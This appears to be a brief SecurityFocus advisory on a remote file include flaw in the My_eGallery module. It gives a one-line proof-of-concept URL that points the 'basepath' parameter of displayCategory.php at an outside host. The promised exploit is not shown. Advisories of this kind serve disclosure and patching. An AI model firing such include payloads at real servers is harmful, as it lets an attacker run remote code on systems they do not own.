My_EGallery Module Remote Include Command Injection Vulnerability

The following proof of concept has been provided:

http://www.example.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.example.com

The following exploit has been made available:


 

Privacy Statement
Copyright 2010, SecurityFocus